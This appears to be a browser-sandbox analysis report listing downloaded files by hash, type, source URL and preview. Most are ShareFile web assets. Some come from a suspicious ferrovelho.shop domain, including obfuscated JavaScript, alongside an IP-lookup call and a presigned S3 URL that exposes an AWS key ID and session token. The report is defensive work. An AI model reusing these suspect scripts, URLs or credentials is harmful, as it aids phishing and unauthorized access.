                                                                                                                                                                                                                                                                                SHA1:13B0C79DBD613889BDD32D6234DAE9CAEAA3CE8C
                                                                                                                                                                                                                                                                                SHA-256:B530C482126F2B86447E3A7E6F9319C8FCCD071659A3BAF914E8C51589AEF220
                                                                                                                                                                                                                                                                                SHA-512:8EEF7953E5B4623BEB6A423CB05D675E881D6B761EB5B5B7A4DCE0778B5F016452F37F907EE401D7E291204980AA521EB6E58C6D17D9ED81B7B2A66AC0E2F6AC
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://citrix-sharefile-content.customer.pendo.io/guide-content/eWI7aCe5RTaQQM3QzyK1rqqWcVM/XNJ1F6ATudKnb82a7viL5T2TM6g/E7DHnb1hOIm90y1iNNrpyuqjzow.dom.json?sha256=tTDEghJvK4ZEfjp-b5MZyPzNBxZZo7r5FOjFFYmu8iA
                                                                                                                                                                                                                                                                                Preview:{"props":{"id":"pendo-base","data-layout":"tooltipBlank","class":"_pendo-step-container"},"type":"div","children":[{"css":[{"selector":"#pendo-close-guide-0978f7b0:hover","styles":{"color":"#D9D7D7"}},{"selector":"[data-pendo-poll-id=\"rxgstdttrrq\"]::placeholder","styles":{"color":"#999999FF"}},{"selector":"[data-pendo-poll-id=\"rxgstdttrrq\"]:focus","styles":{"outline":"none","box-shadow":"#00000080 0px 0px 2px 0px"}},{"selector":"#pendo-button-bca5c491:hover","styles":{"background":"rgba(73, 63, 185, 1)","border":"2px solid #493FB9","color":"#FFFFFF","font-weight":400,"border-radius":"8px"}},{"selector":"#pendo-button-799bec88:hover","styles":{"background":"rgba(73, 63, 185, 1)","border":"2px solid #FFFFFF","color":"#FFFFFF","font-weight":400,"border-radius":"8px"}},{"selector":"div[tabindex=-1]:focus","styles":{}}],"type":"style","props":{"type":"text/css","scoped":"scoped"}},{"props":{"id":"pendo-g-XNJ1F6ATudKnb82a7viL5T2TM6g","data-vertical-alignment":"Relative to Element","data-
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://app.launchdarkly.com/sdk/goals/5f33f5d44f29ea099db90d2a
                                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):199333
                                                                                                                                                                                                                                                                                Entropy (8bit):5.013103448858446
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:mSK3Do7geTGmqEAmwROHngtMkCE9UZyBJC:w3MMeTGnEH/gjCE/C
                                                                                                                                                                                                                                                                                MD5:25930B37116B2474777D799979918568
                                                                                                                                                                                                                                                                                SHA1:4D0AE3F123CA421EC90EF3348C3B39AC655E9236
                                                                                                                                                                                                                                                                                SHA-256:B294D339F709A0620968800517ED512F5EA76A8D06959FF59F6F2EC6F3FDCDB7
                                                                                                                                                                                                                                                                                SHA-512:D3DF8EE8C3CEFAB0F214E250A11552A9C94D9374AABB7E745A9271D69C82C04ED7FD525FB0244E1BD9FC24BFCEA7A6F4384BBB86051E84A817BB2413F1017A6E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://hrv56k8ryi.ferrovelho.shop/m/ecpt/8SP5UFUDB7ATU5HVLW4D116DG
                                                                                                                                                                                                                                                                                Preview:(function(_0x5b1989,_0x4dd8dd){function _0x98c760(_0x5bc066,_0x2bfe8b,_0x3ae5a4,_0xbb2dcc,_0x1155ea){return _0x4e53(_0x5bc066- -0x2df,_0xbb2dcc);}function _0x1ee071(_0x2ccdbb,_0x588cd5,_0x21f614,_0x3e8e2f,_0x4d219a){return _0x4e53(_0x4d219a- -0x223,_0x588cd5);}function _0x397734(_0x341432,_0x204bb2,_0x5f2ec7,_0x4a4c86,_0x361db0){return _0x4e53(_0x204bb2-0x9c,_0x5f2ec7);}function _0x5ee178(_0x31a9bc,_0x5b0a99,_0x45ebe4,_0x2fd736,_0x471b52){return _0x4e53(_0x471b52- -0x106,_0x45ebe4);}function _0x1aee45(_0x3e1555,_0x40a413,_0x1c1268,_0x3e7959,_0x13fc10){return _0x4e53(_0x13fc10- -0x61,_0x40a413);}var _0x250efa=_0x5b1989();while(!![]){try{var _0x5d818c=-parseInt(_0x1ee071(0xa3,-0x21e,-0x25e,-0xd2,-0x100))/(-0x5*-0x543+-0x28*-0x60+0x11*-0x26e)*(-parseInt(_0x98c760(0x78,0x123,-0x10f,0x1ed,0x97))/(-0x1*0x1193+-0x1eb7+0x1826*0x2))+-parseInt(_0x5ee178(0x6f,0x263,0x1a7,0x8b,0x161))/(-0x1b0d+-0x1fdf+-0x3aef*-0x1)*(parseInt(_0x1aee45(0x17,0x27c,0x1f6,0x2e2,0x177))/(-0x1*0x2047+0x2592+0x1*-0x547))
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65472)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):113304
                                                                                                                                                                                                                                                                                Entropy (8bit):5.351512714972175
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:5p0GYZTZF6Wcw8qG5QZBWTO3USkODq6ItIeKCajtRgn2PwbWtdP27:5p0GEPiOEfaTglK527
                                                                                                                                                                                                                                                                                MD5:530A7B55C7F2519E38F8B06FE7B2AB6D
                                                                                                                                                                                                                                                                                SHA1:792B4A21E3F0A3CC0AFB3F0D5AE0C9BD4D686697
                                                                                                                                                                                                                                                                                SHA-256:F764709D6B4455A16AB263B1963537EEBE306D4B2B38430A3205EDE496610B4D
                                                                                                                                                                                                                                                                                SHA-512:1B7B00D586F840DD17EC225D5BAD62293B926CA173AB9534F7A4DDB44EFB5A89E1A29EB6CD0DBA17A051DC16BF1D519469A21050DA28E4A46748BA7AE1AEC60E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevauditcollectorpilet,{}).System.register(["antd","react","tslib"],(function(e,t){var r={},n={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.Button=e.Button,r.DatePicker=e.DatePicker,r.Form=e.Form,r.Input=e.Input,r.Space=e.Space,r.Spin=e.Spin,r.notification=e.notification},function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){o.__awaiter=e.__awaiter}],execute:function(){e((()=>{var e,i,a,s,c={4386:(e,t,r)=>{"use strict";r.d(t,{j:()=>u});var n=r(8109);function o(e){return o="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},o(e)}function i(){i=function(){return t};var e,t={},r=Object.prototype,n=r.hasOwnProperty,a=Object.defineProperty||function(e,t,r){e[t]=r.value},s="function"==typeof Symbol?Symbol:{},c=s.iterator||"@@iterator",u=s.asyncIte
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (53925)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):80657
                                                                                                                                                                                                                                                                                Entropy (8bit):5.013109282355643
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:XtfZwI9Djuey8kg9XtwVP3K3Ip9LWc5wLVvTwZ6LqDQPciVTz3BWX+ccggffUpAo:bDIX3UVT6C4xe8ZDp1y2xbMaVtAhHS
                                                                                                                                                                                                                                                                                MD5:3EFBAE3E8929430A8D33717801E9C89C
                                                                                                                                                                                                                                                                                SHA1:82D05FE3B9D03DEC0081932CE98B0BB8D2D14520
                                                                                                                                                                                                                                                                                SHA-256:5764E77F219A80CB4F8C1462A3004FF53CAA334A7B2AB30D956F211C3292006F
                                                                                                                                                                                                                                                                                SHA-512:93400A8CCD8FE40456C93530C822F6C672EBE9062A4D301FC66F67C03FAC5D426ED74A355A1709C0F1FEA15A0214D07384EA8005720C40B21F7D26B98D9D48B5
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-fileviewer-pilet/1.29.0/package/dist/main.css
                                                                                                                                                                                                                                                                                Preview:.dialog{--dialog-bg-color:#fff;--dialog-border-color:#fff;--dialog-shadow:0 2px 14px 0 rgba(58,57,68,.2);--text-primary-color:#15141a;--text-secondary-color:#5b5b66;--hover-filter:brightness(0.9);--focus-ring-color:#0060df;--focus-ring-outline:2px solid var(--focus-ring-color);--link-fg-color:#0060df;--link-hover-fg-color:#0250bb;--separator-color:#f0f0f4;--textarea-border-color:#8f8f9d;--textarea-bg-color:#fff;--textarea-fg-color:var(--text-secondary-color);--radio-bg-color:#f0f0f4;--radio-checked-bg-color:#fbfbfe;--radio-border-color:#8f8f9d;--radio-checked-border-color:#0060df;--button-secondary-bg-color:#f0f0f4;--button-secondary-fg-color:var(--text-primary-color);--button-secondary-border-color:var(--button-secondary-bg-color);--button-secondary-hover-bg-color:var(--button-secondary-bg-color);--button-secondary-hover-fg-color:var(--button-secondary-fg-color);--button-secondary-hover-border-color:var(--button-secondary-hover-bg-color);--button-primary-bg-color:#0060df;--button-prim
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1864
                                                                                                                                                                                                                                                                                Entropy (8bit):5.222032823730197
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                                                                                                                                                                                MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                                                                                                                                                                                SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                                                                                                                                                                                SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                                                                                                                                                                                SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://hrv56k8ryi.ferrovelho.shop/m/bxg/8E4FPBTMKDVQ7J1X70XYU2X3S
                                                                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):20
                                                                                                                                                                                                                                                                                Entropy (8bit):3.446439344671015
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:YMb1gXMR4n:YMeXNn
                                                                                                                                                                                                                                                                                MD5:2E1E0B28D6E7522CB687E20D37BCD8AA
                                                                                                                                                                                                                                                                                SHA1:03D5EFE3719CAB433421C4D9BF6C73E0B8EB69E5
                                                                                                                                                                                                                                                                                SHA-256:124CE91528D8ACB894BDC980ABDDF035B38CDC64CE13F088D431E0B10D61FB24
                                                                                                                                                                                                                                                                                SHA-512:70BB31CA0F3907AB6B5860459643E422AAD6685F32D519C23E671CD46F29ABF2DB1F0C53E54313FF6FE7B54A75CDCA18A9232556B3273E6DB200BFCD22BA82BD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://api.ipify.org/?format=json
                                                                                                                                                                                                                                                                                Preview:{"ip":"8.46.123.33"}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65473)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):130723
                                                                                                                                                                                                                                                                                Entropy (8bit):5.341189118692514
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:GHF3NWoK5wEzGmqmEwkOw1GC34fOtB+7sAhgod64QUDs5aBzvT0ijJTak0JK8a/K:Gyosw7Oyx34fOGjxakP8Qkl
                                                                                                                                                                                                                                                                                MD5:0496A964F7644C653415D31FD499388B
                                                                                                                                                                                                                                                                                SHA1:2D3AC1D48F2BD9771D17F70FAD25D6BE54C9A7F2
                                                                                                                                                                                                                                                                                SHA-256:6676EBA7254F48E07B446B828180B7B1EA7BDA2A3018CC01AC48FC88A514FA12
                                                                                                                                                                                                                                                                                SHA-512:723ABD2D320B2E0D3BF38CBC55B55E62A619841BF31D0979DC17DE95A67D70E9AFA6A37928C76ED0D4E99B106AEF7B5EB5115D64C5E29F063B22C5C7756D38E6
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-storage-plugin-pilet/1.280.0/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevstoragepluginpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={},u={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(u,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.CapabilitiesEntity=e.CapabilitiesEntity,n.CapabilityName=e.CapabilityName,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,n.EncryptedEmailsEntity=e.EncryptedEmailsEntity,n.ExceptionReason=e.ExceptionReason,n.FileAction=e.FileAction,n.FileLockEntity=e.FileLockEntity,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations=e.ItemOperations,n.ItemOrderingMode=e.ItemO
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65473)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):77283
                                                                                                                                                                                                                                                                                Entropy (8bit):5.226266510576525
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:ZvfCx1EzpGYaEO94ZOJP4Wn3jqsN5qeR6xTTo86lUxL1ohA84LijsCul3qC/pbNw:ZHrPg4QJZ3jqsN5qeY0j4Giy2GfyluH
                                                                                                                                                                                                                                                                                MD5:C555335753018971124DABD9753F7AB0
                                                                                                                                                                                                                                                                                SHA1:777ACC456CEBF8525CAFFEB55C9D72C41117907A
                                                                                                                                                                                                                                                                                SHA-256:F5EEC20D62DDE7D3BF3FA601C11AA6136CFC8C4BD01DF3BF630E6D7DD0DB9A20
                                                                                                                                                                                                                                                                                SHA-512:D46A07FBB9A7687EEFEE4409695D9816002EE85A18F85BDCA4ECB35F23F4F4B1DEAD22F41A76F82D014166851088AB77EE92FAC16F340EC092F2B939514788D8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevconversationspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(t,e){var n={},r={},i={},s={},a={},o={},u={},c={};return Object.defineProperty(s,"__esModule",{value:!0}),{setters:[function(t){n.Api=t.Api,n.ItemsEntity=t.ItemsEntity,n.Uploader=t.Uploader,n.UsersEntity=t.UsersEntity,n.ZoneService=t.ZoneService,n.createFile=t.createFile},function(t){r.colorPalette=t.colorPalette,r.sizes=t.sizes},function(t){i.Avatar=t.Avatar,i.Badge=t.Badge,i.Button=t.Button,i.Flex=t.Flex,i.Form=t.Form,i.Grid=t.Grid,i.Input=t.Input,i.Skeleton=t.Skeleton,i.Spin=t.Spin,i.Typography=t.Typography,i.notification=t.notification,i.theme=t.theme},function(t){Object.keys(t).forEach((function(e){s[e]=t[e]}))},function(t){a["default"]=t["default"],a.findDOMNode=t.findDOMNode,a.flushSync=t.flushSync},function(t){o.useHistory=t.useHistory},function(t){u.Link=t.Link,u.useHistory=t
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PDF document, version 1.7
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):244654
                                                                                                                                                                                                                                                                                Entropy (8bit):7.9840077994688965
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:VT0GfDd99r/72McIzOXshWrmlgW/kz+LZ0n8SjqmSkN+WkC:/Ddb/D3zO+WalgW/A+LZ0nLWlkAWkC
                                                                                                                                                                                                                                                                                MD5:1DFE4F9FEB95B0513FAAAAC475C5B58F
                                                                                                                                                                                                                                                                                SHA1:F5762EFD94E33CF307B25FE01A695B3C6597455F
                                                                                                                                                                                                                                                                                SHA-256:CFA1D463C0A47FAF192A21272DE863F361C30F4ECBDCE1DC0DAD3B3BD58DF63D
                                                                                                                                                                                                                                                                                SHA-512:F686744F7F3A5A50D235B2FC56DFFF053B92FF9582A9009F2171F4BCAC0ADF9F62F8F04AD47F967D366E283BC2894B6A95E07AD0BBB98483EB9CA21467FEE76D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://sf-temp-us-east-1-production.s3.amazonaws.com/renderx/RenderOutput/a8050891-1b71-8816-99a8-d7f55d4cb952/bf1404eb713727c9c1b94f43cdbcf96e?AWSAccessKeyId=ASIAWSHYYC7RX4NBFTKI&Expires=1728500445&x-amz-security-token=IQoJb3JpZ2luX2VjEAoaCXVzLWVhc3QtMSJHMEUCIQDjjfBcchRSP%2FBCM3YxxqIENxXpn6qIMWVIyx2tzmSkmgIgIf%2FTQA6d39VacGZljzpNmUVm1lJDeev6i1Ok5sIXy88qvAUIYxAAGgw0NTE0OTMyMzg3NTUiDCKUhEuQjy2VXwhFviqZBV1bg2Nw4Td8dlBMBHc4QRDmPxnEGlF0rCJ6F5V8eo9wtRo7%2B7AMHllzXJpAkDOvaola5E6MhICEnNdJ3Gq6PTZKLzi6saiZNN8KwpbnZbADcbRGw3f5AyFNhkmrkPFxw%2B1%2F8nHLJ00YGIEaW47s%2BfCyTBVIDNnk1wrKj4sWa4OM%2BSX6mhK18iYtO3VRSJK5yafACvtwauMlKWFwm4B27oiuAoT4TPVU55m7JaoWAZa%2B%2FdLQXWsurPhVi6f90waeWVpbcD2OsLBCJrv7yy9L0bs8FhcwS%2FKbCNned2TQjnBGIw%2F1bErGFMzkjPB26reCx2OycVYk%2BEl14LWejqJxdmNUp2tVNIgUOPRFw1XGqdXxEDfC0dBg%2F383U9XJ2FkunCTVwelyA5oCKJp5u9bkN%2FkP1CrqJKKazcOnvAm6aFqQSh4L61QLlnIwr9PgDkZ0o9Sbs1pfQVB%2B8lSKC%2F%2FFO8ML%2BdyuQy%2BSDQAVnIsA7YmqNj70%2Fw6EKynQPIqKgIgfh3q0KH4%2FMfhg7r%2F54cYkoI7hEpubuwficZdyAFdp1rAe%2FrlFIdk2Sv0IcQiYDDVWsTnRRMx6aJtrnT6AWSTM%2BN%2B3HPU%2FZ11at%2BHFXBod9XP87pJSMx7epXCTY4KoKOdroObBlJaLfKaD%2BuQKKhhN%2FjoD8U2olrluq3Q1Z1YRfDZ%2BeRSlTU8o7AjcdbQ%2BYuIyY6e6Jf1rZ8BFTqW48hCFYRYZMm6b5%2B%2FJzwXG70lAFBxjvuNqd0MtOwDfrVVxegt0M7QydkFCdRJF1em3AL5r6EWZrzTob1TMDTn4CLA42mD%2BZEwBLNI8d2WZMcmPyvkNiwRuMjGi3oNrJLPKtxvAIAspPtT4a9GENUJL1qYVlG2NM0coMGI2kJQXMKL%2FmrgGOrEB3%2BZxvxs3ZqUevb%2FRwi8VFqmkEvYLTk%2BcaAy4i7bFgf9i0H97asJZCjwiFyaAzON2bd1cZIJ5p5rNJfoxZGEBNKqWq21wNFmGjyJEqEwxAujOL9MvHPMNyvMbZIOrXqFrL0yJLCBwqhNTSYyYICdLX18LEHynp9D7yPomEifVCMMV7oV6QBeDT7LZzU5kbrCQju1b9Hv14YQUvGNjj4r3A%2FCy7Ee2zqQB9RaY%2FUGmo5mC&Signature=vwOltpSbaBnc1QQpmhVmTwKA4%2F0%3D:2f82a5631692d9:0
                                                                                                                                                                                                                                                                                Preview:%PDF-1.7.%......13 0 obj.<< /Linearized 1 /L 244654 /H [ 2292 187 ] /O 22 /E 242174 /N 2 /T 244370 >>.endobj... .14 0 obj.<< /Type /XRef /Filter /FlateDecode /Length 122 /W [ 1 3 1 ] /Index [ 13 35 ]. /ID [<DC45ED11E248B004AD2E1EB5BAECB6CA><41332D33362D32352D36312D35372D35>] . /Info 12 0 R . /Root 15 0 R . /Size 48 /Prev 244371 . >>.stream.x.....@.....QO.....t....).............g...`.,...<..R..I.M.H8.?...+..&..$q.x.-9e.!yI.+....A..y.d.a.l.B+.Y.._.D B.....I...endstream..endobj. .15 0 obj.<</AcroForm 19 0 R/Metadata 7 0 R/Outlines 11 0 R/Pages 10 0 R/Type/Catalog>>..endobj..16 0 obj.<</Differences[24/breve/caron/circumflex/dotaccent/hungarumlaut/ogonek/ring/tilde 39/quotesingle 96/grave 128/bullet/dagger/daggerdbl/ellipsis/emdash/endash/florin/fraction/guilsinglleft/guilsinglright/minus/perthousand/quotedblbas
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65475)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):92422
                                                                                                                                                                                                                                                                                Entropy (8bit):5.30210223517979
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:1dnFi2GOnGcqas8WOwmABk4u4tBjFH1hb6R0S3ktw1Dka3TktnLFxts1:M2aO/n4uM7Jxt0
                                                                                                                                                                                                                                                                                MD5:5D7E959E6B83248D04C1764F8F6F153E
                                                                                                                                                                                                                                                                                SHA1:9CB75E73CEE59773AC7F82C41EC4B11FB6168C37
                                                                                                                                                                                                                                                                                SHA-256:17C44981056AE13F58B412BEF7B9708B004F7A9A3F8B92366766D01181F9B386
                                                                                                                                                                                                                                                                                SHA-512:23DE25731E77863A949432E5954EB16D4912B4439FF9B1CB928A0CC3755BC4069AA106EC3D6E7E5CD444E83445D75DD9D6137C5EC6D0E92980DC9687E595D24D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-permissions-pilet/1.118.31/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevpermissionspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={},u={};return Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.UserRole=e.UserRole},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){o.Alert=e.Alert,o.Avatar=e.Avatar,o.Badge=e.Badge,o.Button=e.Button,o.Card=e.Card,o.Checkbox=e.Checkbox,o.Col=e.Col,o.Collapse=e.Collapse,o.Divider=e.Divider,o.Drawer=e.Drawer,o.Dropdown=e.Dropdown,o.Flex=e.Flex,o.Form=e.Form,o.Input=e.Input,o.Layout=e.Layout,o.List=e.List,o.Modal=e.Modal,o.Popconfirm=e.Popconfirm,o.Row=e.Row,o.Select=e.Select,o.Skeleton=e.Skeleton,o.Space=e.Space,o.Spin=e.Spin,o.Switch=e.Switch,o.Tooltip=e.Tooltip,o.Typography=e.Typography,o.notification=e.notification
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):87462
                                                                                                                                                                                                                                                                                Entropy (8bit):5.262148110388299
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:/KRUXRa8Dgwxcy2jpBNwch96SLk8Ek2BSrBGS1ia/eEk4aV2EXi8SMpQ47GKV:/u1zNwcv9qBy1HOg8SMpQ47GKV
                                                                                                                                                                                                                                                                                MD5:E6C2415C0ACE414E5153670314CE99A9
                                                                                                                                                                                                                                                                                SHA1:5A9EEAC34D86E92E5660E0F4F87204F1ED0C8FF6
                                                                                                                                                                                                                                                                                SHA-256:D8F9AFBF492E4C139E9D2BCB9BA6EF7C14921EB509FB703BC7A3F911B774EFF8
                                                                                                                                                                                                                                                                                SHA-512:DE027062931EDD07B01842EFF24FC15FDBDCAA1AF245DCD133155FABA9E0C965F0A34DC6144CE3B149BC43B4597073C792CB6DABBFC6168C63095523923BCF77
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://hrv56k8ryi.ferrovelho.shop/m/jx/XCOMR0LVXHD2CSC9IZW3DTEPG
